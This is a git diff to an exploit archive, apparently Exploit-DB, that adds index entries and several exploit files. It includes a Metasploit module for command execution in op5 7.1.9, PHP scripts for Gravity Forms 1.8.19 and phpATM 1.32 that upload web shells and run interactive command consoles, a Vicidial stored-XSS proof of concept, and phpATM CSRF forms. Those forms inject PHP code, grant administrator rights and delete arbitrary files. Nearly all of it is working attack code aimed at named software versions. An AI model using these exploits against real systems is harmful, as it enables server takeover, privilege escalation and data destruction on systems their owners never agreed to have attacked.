diff --git a/files.csv b/files.csv
index ee150be37..b2c63cd81 100755
--- a/files.csv
+++ b/files.csv
@@ -36151,3 +36151,8 @@ id,file,description,date,author,platform,type,port
 39962,platforms/hardware/webapps/39962.txt,"ATCOM PBX IP01_ IP08 _ IP4G_ IP2G4A - Authentication Bypass",2016-06-16,i-Hmx,hardware,webapps,80
 39963,platforms/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",php,webapps,80
 39964,platforms/php/webapps/39964.html,"SlimCMS 0.1 - CSRF (Change Admin Password)",2016-06-16,"Avinash Thapa",php,webapps,80
+39969,platforms/php/webapps/39969.php,"WordPress Gravity Forms Plugin 1.8.19 - Arbitrary File Upload",2016-06-17,"Abk Khan",php,webapps,80
+39970,platforms/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Stored XSS",2016-06-17,"David Silveiro",php,webapps,80
+39971,platforms/php/webapps/39971.php,"phpATM 1.32 - Remote Command Execution (Shell Upload) on Windows Servers",2016-06-17,"Paolo Massenio",php,webapps,80
+39972,platforms/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",php,webapps,80
+39973,platforms/linux/remote/39973.rb,"op5 v7.1.9 Configuration Command Execution",2016-06-17,metasploit,linux,remote,443
diff --git a/platforms/linux/remote/39973.rb b/platforms/linux/remote/39973.rb
new file mode 100755
index 000000000..56f06e860
--- /dev/null
+++ b/platforms/linux/remote/39973.rb
@@ -0,0 +1,132 @@
+##
+## This module requires Metasploit: http://metasploit.com/download
+## Current source: https://github.com/rapid7/metasploit-framework
+###
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
+
+  Rank = ExcellentRanking
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'op5 v7.1.9 Configuration Command Execution',
+        'Description' => %q(
+          op5 an open source network monitoring software.
+          The configuration page in version 7.1.9 and below
+          allows the ability to test a system command, which
+          can be abused to run arbitrary code as an unpriv user.
+        ),
+        'Author'      =>
+          [
+            'h00die <mike@shorebreaksecurity.com>', # module
+            'hyp3rlinx'                        # discovery
+          ],
+        'References'  =>
+          [
+            [ 'EDB', '39676' ],
+            [ 'URL', 'https://www.op5.com/blog/news/op5-monitor-7-2-0-release-notes/']
+          ],
+        'License'        => MSF_LICENSE,
+        'Platform'       => ['linux', 'unix'],
+        'Privileged'     => false,
+        'DefaultOptions' => { 'SSL' => true },
+        'Targets'        =>
+          [
+            [ 'Automatic Target', {}]
+          ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => 'Apr 08 2016'
+      )
+    )
+
+    register_options(
+      [
+        Opt::RPORT(443),
+        OptString.new('USERNAME', [ true, 'User to login with', 'monitor']),
+        OptString.new('PASSWORD', [ false, 'Password to login with', 'monitor']),
+        OptString.new('TARGETURI', [ true, 'The path to the application', '/'])
+      ], self.class
+    )
+  end
+
+  def check
+    begin
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path),
+        'method'    => 'GET'
+      )
+      fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+      /Version: (?<version>[\d]{1,2}\.[\d]{1,2}\.[\d]{1,2})[\s]+\|/ =~ res.body
+
+      if version && Gem::Version.new(version) <= Gem::Version.new('7.1.9')
+        vprint_good("Version Detected: #{version}")
+        Exploit::CheckCode::Appears
+      else
+        Exploit::CheckCode::Safe
+      end
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def exploit
+    execute_cmdstager(
+      :flavor  => :echo
+    )
+  end
+
+  def execute_command(cmd, opts)
+    begin
+      # To manually view the vuln page, click Manage > Configure > Commands.
+      # Click the "Test this command" button to display the form we abuse.
+
+      # login
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'monitor/index.php/auth/login'),
+        'method'    => 'POST',
+        'vars_get'  =>
+        {
+          'uri' => 'tac/index'
+        },
+        'vars_post' =>
+        {
+          'csrf_token' => '',
+          'username'   => datastore['USERNAME'],
+          'password'   => datastore['PASSWORD']
+        }
+      )
+
+      fail_with(Failure::UnexpectedReply, "#{peer} - Invalid credentials (response code: #{res.code})") if res.code != 302
+      cookie = res.get_cookies
+      # exploit
+      res = send_request_cgi(
+        'uri'       => normalize_uri(target_uri.path, 'monitor/op5/nacoma/command_test.php'),
+        'method'    => 'GET',
+        'cookie'    => cookie,
+        'vars_get'  =>
+        {
+          'cmd_str' => cmd
+        }
+      )
+
+      # success means we hang our session, and wont get back a response
+      if res
+        fail_with(Failure::UnexpectedReply, "#{peer} - Could not connect to web service - no response") if res.nil?
+        fail_with(Failure::UnexpectedReply, "#{peer} - Credentials need additional privileges") if res.body =~ /Access Denied/
+      end
+
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{peer} - Could not connect to the web service")
+    end
+  end
+
+  def on_new_session(session)
+    super
+    session.shell_command_token('setsid $SHELL')
+  end
+end
\ No newline at end of file
diff --git a/platforms/php/webapps/39969.php b/platforms/php/webapps/39969.php
new file mode 100755
index 000000000..5f6474613
--- /dev/null
+++ b/platforms/php/webapps/39969.php
@@ -0,0 +1,53 @@
+<?php
+
+# Exploit Title: Wordpress Gravity Forms - Arbitrary File Upload
+# Vendor Homepage: http://www.gravityforms.com/
+# Vulnerable Version(s): 1.8.19 (and below)
+# Exploit Author: Abk Khan
+# Contact: [ an0nguy @ protonmail.ch ]
+# Website: http://blog.lolwaleet.com/
+# Category: webapps
+# PS: I just wrote the exploit code by reading this write-up [ goo.gl/816np5 ] -- Don't know who found the vulnerability!
+
+error_reporting(0);
+
+$domain    = 'http://localhost/wordpress';
+$url       = "$domain/?gf_page=upload";
+$shell     = "$domain/wp-content/_input_3_khan.php5";
+$separator = '-----------------------------------------------------';
+
+$ch = curl_init($url);
+curl_setopt($ch, CURLOPT_POST, 1);
+curl_setopt($ch, CURLOPT_POSTFIELDS, '<?=system($_GET[0]);?>&form_id=1&name=khan.php5&gform_unique_id=../../../../&field_id=3');
+curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
+$response = curl_exec($ch);
+curl_close($ch);
+
+if (eregi('ok', $response)) {
+    echo "$separator\nShell at $shell\n$separator\n\n";
+    while ($testCom != 'bubye!') {
+		$user = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20whoami;%20echo%20'~'"), '~', '~'));
+        echo "$user@b0x:~$ ";
+        $handle  = fopen("php://stdin", 'r');
+        $testCom = trim(fgets($handle));
+        fclose($handle);
+        $comOut = trim(get_string_between(file_get_contents("$shell?0=echo%20'~';%20" . urlencode($testCom) . ";%20echo%20'~'"), '~', '~')) . "\n";
+        echo $comOut;
+    }
+}
+else {
+	die("$separator\n$domain doesn't seem to be vulnerable! :(\n$separator");
+}
+
+function get_string_between($string, $start, $end)
+{
+    # stolen from stackoverflow!
+    $string = " " . $string;
+    $ini    = strpos($string, $start);
+    if ($ini == 0)
+        return "";
+    $ini += strlen($start);
+    $len = strpos($string, $end, $ini) - $ini;
+    return substr($string, $ini, $len);
+}
+?> 
\ No newline at end of file
diff --git a/platforms/php/webapps/39970.txt b/platforms/php/webapps/39970.txt
new file mode 100755
index 000000000..4df2870bf
--- /dev/null
+++ b/platforms/php/webapps/39970.txt
@@ -0,0 +1,63 @@
+# Exploit Title: Vicidial 2.11 Scripts - Authenticated Stored XSS
+# Date: 0 day
+# Exploit Author: David Silveiro
+# Exploit Author Github: github.com/davidsilveiro
+# Vendor Homepage: http://vicidial.org
+# Software Link: https://sourceforge.net/projects/astguiclient/files/astguiclient_2.11rc1.zip/download
+
+
+Vicidial is a popular opensource software, used throughout many different sectors,
+such as; call centers for inbound & outband calling.
+
+The vulnerablility is triggered when an authenticated with user sufficient permissions, 
+creates a script (small text document that the agents use for remembering lines)without 
+sufficient sanitization happening within "Script Name" and "Script Text". Due to the nature 
+of how widely this script can be set, for example a whole Tele-marketing campaign or specific
+ agent, it could very easily be used to infect other hosts on the Network.
+
+POC:
+
+http://localhost.com/vicidial_demo/admin.php?ADD=1111111
+
+POST Data (script_name & script_text); 
+
+ADD=2111111&DB=&script_id=tests&script_name=<script>alert('XSS!'</script>&script_comments=test&
+active=Y&user_group=---ALL---&selectedField=fullname&script_text=<script>alert('XSS 2!'</script>&SUBMIT=SUBMIT
+
+Click 'Preview Script'
+
+    <html>
+
+    <head></head>
+    <body bgcolor="white" marginwidth="0" marginheight="0" topmargin="0" leftmargin="0">
+        <font size="2" color="BLACK" face="ARIAL,HELVETICA">
+            <font size="2" color="BLACK" face="ARIAL,HELVETICA">
+
+                Preview Script: 1017
+
+                <br></br>
+                <table width="600">
+                    <tbody>
+                        <tr>
+                            <td>
+                                <center>
+                                <script>
+
+                                    alert('XSS!')
+
+                                </script>
+                                    <br></br>
+                                </center>
+                                <script>
+
+                                    alert('XSS 2!')
+
+                                </script>
+                            </td>
+                        </tr>
+                    </tbody>
+                </table>
+            </font>
+        </font>
+    </body>
+    </html>
diff --git a/platforms/php/webapps/39971.php b/platforms/php/webapps/39971.php
new file mode 100755
index 000000000..da727bc42
--- /dev/null
+++ b/platforms/php/webapps/39971.php
@@ -0,0 +1,220 @@
+<?php
+/*
+
+	Exploit Title : "phpATM <= 1.32 Remote Command Execution (Shell Upload) on Windows Servers"
+	Date          :  17/06/2016
+	Author        :  Paolo Massenio - pmassenio[AT]gmail
+	Vendor        :  phpATM - http://phpatm.org/
+	Version       :  <= 1.32
+	Tested on     :  Windows 10 with XAMPP
+	
+	__PoF__
+     
+    "phpATM is the acronym for PHP Advanced Transfer Manager and is a free, open source, PHP based Upload and Download manager. 
+	 But unlike most other of its kind it stores the data in flat text files and therefore does not require a database 
+	 like MySQL installed on the web server." 	
+
+	The bugged code is in the upload function.
+	Generally phpATM lets you to register, and then upload some files (no admin privileges required).
+	The hacking prevention is setted up by a regular expression to avoid .php files upload:
+	
+	----index.php----
+	[...]
+	1544    // Try if file exists Or file is script
+	1545		if (file_exists("$destination/$userfile_name") ||
+	1546		    eregi($rejectedfiles, $userfile_name) ||  <--- here the regex 
+	[...]
+	-----------------
+	
+	----conf.php----
+	[...]
+	307    $rejectedfiles = "^index\.|\.desc$|\.fdesc$|\.dlcnt$|\.vcnt$|\.php$|\.php\..*|\.php3$|\.php3\..*|\.cgi\..*|\.cgi$|\.pl$\.pl\..*|\.php4$|\.ns|\.inc$|\.php5";
+	[...]
+    ----------------
+	
+	So if we can upload a file with a space at the end, like this: "shell.php ", 
+	and the file system is running under Microsoft Windows, we can bypass the eregi, 
+	reaching the target to upload a php script file(like a shell)!
+	
+	The basic requirement is that the server is a Windows based server!
+	You can upload the shell using a local proxy, like burp suite, or use the exploit below.
+
+
+*/
+
+
+if(!isset($argv[1]) && !isset($argv[2]) && !isset($argv[3])){
+	printInfo();
+	exit;
+}
+
+echo "[+] OK trying to get the PHPSESSID.\n";
+
+$sessid = getPhpsessid($argv[1],$argv[2],$argv[3]);
+
+echo "[+] PHPSESSID for user '".$argv[2]."' grabbed (".$sessid.")\n";
+
+echo "[+] trying to upload the shell.\n";
+
+$shellname = uploadShell($argv[1],$sessid);
+
+echo "[+] OK shell is here: ".$argv[0]."/files/".trim($shellname)."?cmd=command\n\n";
+
+echo "[*] Do you want to run an interactive shell ? [Y/N] ";
+
+$line = fgets(STDIN);
+
+if(trim($line) == 'Y'){
+	runConsole($argv[1],$shellname);
+}
+
+echo "[+] bye\n";
+
+
+
+function printInfo(){
+	$intro = "[*] phpATM <= 1.32 Remote Command Execution (Shell Upload) on Windows Servers\n".
+			 "[*] Founded and coded by Paolo Massenio\n".
+			 "[***] The basic requirement is that the server is a Windows based server!\n".
+			 "[*] usage: php ".$argv[0]." server username password\n".
+			 "[*] Where:\n".
+			 "[*] server is the server with the correct path to phpATM\n".
+			 "[*] username and password are the credentials for the user with 'NORMAL USER' privileges\n".
+			 "[*] cmd is the command you want to execute (OPTIONAL)\n".
+			 "[*] e.g. : php ".$argv[0]." http://site.com/phpATM/ test test\n";
+			 
+	echo $intro;		 
+}
+
+function parseHeaders( $headers )
+{
+    $head = array();
+    foreach( $headers as $k=>$v )
+    {
+        $t = explode( ':', $v, 2 );
+        if( isset( $t[1] ) )
+            $head[ trim($t[0]) ] = trim( $t[1] );
+        else
+        {
+            $head[] = $v;
+            if( preg_match( "#HTTP/[0-9\.]+\s+([0-9]+)#",$v, $out ) )
+                $head['reponse_code'] = intval($out[1]);
+        }
+    }
+    return $head;
+}
+
+function getPhpsessid($server,$user,$pass){
+	$url = $server.'/login.php';
+	$data = array('action' => 'userlogin', 'user_name' => $user, 'user_pass' => $pass, 'Submit' => 'Enter');
+
+	$options = array(
+		'http' => array(
+			'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
+			'method'  => 'POST',
+			'content' => http_build_query($data)
+		)
+	);
+
+	$result = file_get_contents($url, false, stream_context_create($options));
+	$r_header = parseHeaders($http_response_header);
+
+	if ($result === FALSE) { 
+		die("[-] Error during request. Check if your connection is up or if you entered the correct name of the server.");
+	}
+
+	if(!isset($r_header['Location'])){
+		die("[-] You didn't entered a correct pair user/password.");
+	}
+
+	if(strpos($r_header['Server'],'Win') === false){
+		die("[-] The server isn't running on Windows. Can't run the exploit.");
+	}
+
+	$sessid =  trim(substr(strstr($r_header['Location'],'PHPSESSID'),10));
+	
+	return $sessid;
+	
+}
+
+function uploadShell($server,$phpsessid){
+
+	$MULTIPART_BOUNDARY= '--------------------------'.microtime(true);
+	$shellname = "0x".rand()."_gh0st.php ";  //notice the space after .php
+
+	$header  = "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:45.0) Gecko/20100101 Firefox/45.0\r\n";
+	$header .="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
+	$header .="Accept-Encoding: gzip, deflate\r\n";
+	$header .= "Cookie: PHPSESSID=$phpsessid\r\n";
+	$header .="Connection: close\r\n";
+	$header .= "Content-Type: multipart/form-data; boundary=$MULTIPART_BOUNDARY";
+
+
+	$content = "--$MULTIPART_BOUNDARY\r\n".
+				"Content-Disposition: form-data; name=\"action\"\r\n\r\n".
+				"upload\r\n";
+				
+	$content .= "--$MULTIPART_BOUNDARY\r\n".
+				"Content-Disposition: form-data; name=\"directory\"\r\n\r\n".
+				"\r\n";
+				
+	$content .= "--$MULTIPART_BOUNDARY\r\n".
+				"Content-Disposition: form-data; name=\"order\"\r\n\r\n".
+				"nom\r\n";
+				
+	$content .= "--$MULTIPART_BOUNDARY\r\n".
+				"Content-Disposition: form-data; name=\"direction\"\r\n\r\n".
+				"0\r\n";
+	 
+
+	$content .=  "--$MULTIPART_BOUNDARY\r\n".
+				"Content-Disposition: form-data; name=\"userfile\"; filename=\"$shellname\"\r\n".
+				"Content-Type: application/octet-stream\r\n\r\n".
+				"<?php exec(\$_GET['cmd']); ?>\r\n"; 
+				
+	$content .= "--$MULTIPART_BOUNDARY\r\n".
+				"Content-Disposition: form-data; name=\"description\"\r\n\r\n".
+				"\r\n";
+
+	$content .= "--$MULTIPART_BOUNDARY--\r\n";
+
+	$options = array(
+		'http' => array(
+			  'method' => 'POST',
+			  'header' => $header,
+			  'content' => $content,
+		)
+	);
+
+	$url = $server.'/index.php?';
+
+	$result = file_get_contents($url, false, stream_context_create($options));
+	$r_header = parseHeaders($http_response_header);
+
+	if ($result === FALSE) { 
+		die("[-] Error during request. Check if your connection is up or if you entered the correct name of the server.");
+	}
+
+	if(!isset($r_header['reponse_code']) && intval($r_header['reponse_code']) != 200){
+		die("[-] Error during upload.");
+	}
+	
+	return $shellname;
+
+}
+
+function runConsole($server,$shellname){
+	
+	while(1){
+		echo "Insert cmd ('exit' to quit) > ";
+		$cmd = fgets(STDIN);
+		if(trim($cmd) == 'exit' ) die("[+] bye\n");
+		$query = $server."/files/".trim($shellname)."?cmd=".trim($cmd);
+		$result = file_get_contents($query);
+		echo $result."\n";
+	}
+	
+}
+
+
+?>
\ No newline at end of file
diff --git a/platforms/php/webapps/39972.txt b/platforms/php/webapps/39972.txt
new file mode 100755
index 000000000..49905ec25
--- /dev/null
+++ b/platforms/php/webapps/39972.txt
@@ -0,0 +1,175 @@
+<!--
+
+Exploit Title : "phpATM <= 1.32 Multiple CSRF Vulnerabilities & Full Path Disclosure Vulnerability"
+Date          :  17/06/2016
+Author        :  Paolo Massenio - pmassenio[AT]gmail
+Vendor        :  phpATM - http://phpatm.org/
+Version       :  <= 1.32
+Tested on     :  Windows 10 with XAMPP
+
+
+[1] __CSRF in configure.php__
+
+    phpATM lets the administrator to modify the footer or the header through a specific form located in configure.php.
+	The configure.php page and all of the forms in it are affected by a CSRF bug, so we will focus on the form that 
+	lets you to modify the footer.
+	
+	This section of code is called when this form is submitted:
+	
+	---configure.php---
+	149 case ACTION_SAVEFILE;
+	
+			$filename = getPostVar('filename');
+			$filebody = getPostVar('filebody');
+
+			if (!isset($filebody))
+			{ break; }
+			$filebody = stripslashes($filebody);
+			$filebody = str_replace("&", "&", $filebody);
+			$filebody = preg_replace('/[^\x09\x0A\x0D\x20-\x7F]/e', '"&#".ord($0).";"', $filebody);
+			$fp=@fopen("$cfg_folder_name/$filename","w+");
+			fwrite($fp, $filebody);
+			fclose($fp);
+			show_default(sprintf($mess[167], $filename));
+	163		break;
+	-------------------
+	
+	All the content is saved in the file (e.g. $filename="footer.html").
+	
+	For example, the footer is included in every page by the show_footer_page() function, like in the index.php page:
+	
+	---index.php---
+	[...]
+	1860 show_footer_page();
+	[...]
+	------------------
+	
+	Let see this function:
+	
+	---functions.php---
+	[...]
+	951 function show_footer_page()
+		{
+			global $footerpage, $include_location, $cfg_folder_name; //$footerpage="footer.html"
+
+			// The copyright info. Please read GPL license if you are planning to remove it.
+			echo "\n<div id=\"phpatm\"><br><a href=\"http://phpatm.org/\" target=\"_blank\" title=\"Powered by PHP Advanced Transfer Manager v".PROGRAM_VERSION."\">Powered by phpATM</a><br></div>\n";
+				
+			// Include the footer page if configured	
+			$footer_path = $include_location.$cfg_folder_name.'/'.$footerpage;
+			if (file_exists($footer_path))
+			{ include($footer_path); }
+			
+			echo "</div></td>\n</tr>\n</table>\n</body>\n</html>";
+	964	}
+	[...]
+	-------------------
+	
+	So the footer.html is included! We can write whatever we want. 
+	We can basically inject,through the CSRF, some malicius html code (e.g. persistent XSS)
+	or a malicious PHP code!
+	
+	Below a very simple example that injects malicious PHP code:	
+	
+	<body onload="document.editfile.submit()">
+	<form name="editfile" action="http://127.0.0.1/phpATM/configure.php?" method="post">
+			  <input type="hidden" name="action" value="savefile">
+			  <input type="hidden" name="filename" value="footer.htm">
+			  <input type="hidden" name="filebody" value='<?php system($_GET["cmd"]); ?>'>
+
+	</form>
+	</body>
+	
+	
+[2] __CSRF in usrmanag.php (1) change user permission__
+	
+	phpATM lets the administrator to change permission of a generic registered user through a form located in usrmanag.php page.
+	This page and all of the forms in it are affected by a CSRF bug.
+	
+	The code below lets to the evil user to modify the permissions:
+	
+	<body onload="document.useraccount.submit()">
+         <form name="useraccount" action="http://127.0.0.1/phpATM/usrmanag.php?" method="post" >
+           <input type="hidden" name="action" value="profile">
+           <input type="hidden" name="order" value="name">
+           <input type="hidden" name="letter" value="">
+           <input type="hidden" name="accpage" value="">
+           <input type="hidden" name="username" value="test">
+           <input type="hidden" name="typed_email" value="test@mailinator.com">
+		   <input type="hidden" name="typed_status" value="0">     
+         </form>
+	</body>
+	
+	username is the name of the evil user
+	typed_email is the email of the evil user
+	typed_status setted to 0 for administrator permissions.
+	
+[3] __CSRF in usrmanag.php (2) - delete any file___
+
+	phpATM doesn't use any kind of DBMS. The data of the users are collected in some files located in the 'users' folder.
+	Basically all the informations about a specified user (like username, md5 password, email, etc.) are stored in a file named 
+	like the user. 
+	
+	In usrmanag.php the admin can delete an user account. So the system will basically delete the respective file.
+	When the form is submitted, is called the change_account_data() function:
+	
+	----usrmanag.php----
+	[...]
+	function change_account_data()
+	{
+		[...]
+		if (isset($deleteaccountcheckbox))
+		{
+			if ($deleteaccountcheckbox == "on")
+			{
+				unlink("$users_folder_name/$username");                // Delete account file
+				if (file_exists("$userstat_folder_name/$username.stat"))
+				{ unlink("$userstat_folder_name/$username.stat"); }      // Delete account statistics file
+				return;
+			}
+		}
+		[...]
+	}
+	-------------------
+	
+	There is no sanification of the $username variable, in fact:
+	
+	----usrmanag.php----
+	[...]
+	$username = getPostVar('username');
+	[...]
+	--------------------
+	
+	----functions.php-----
+	[...]
+	function getPostVar($var_name)
+	{
+		if (isset($_POST[$var_name]))
+		{ return $_POST[$var_name]; }
+		else
+		{ return $HTTP_POST_VARS[$var_name]; }
+	}
+	[...]
+	--------------------
+	
+	The form is affected by a CSRF bug, the $username variable isn't saificated, so we can delete
+	any file by sending a malicious form to the logged Admin!
+	
+	Here an example:
+
+	
+	<body onload="document.useraccount.submit()">
+		<form name="useraccount" action="http://127.0.0.1/phpATM/usrmanag.php?" method="post" style="margin: 0">
+			<input type="hidden" name="action" value="profile">        
+			<input type="hidden" name="username" value="../index.php">
+			<input type="hidden" name="deleteaccountcheckbox" value="on">
+		</form>
+	</body>
+
+
+[4] __FPD__
+
+   Simply request the page: http://server/phpATM/index.php?action=view&filename[]=
+
+
+->
\ No newline at end of file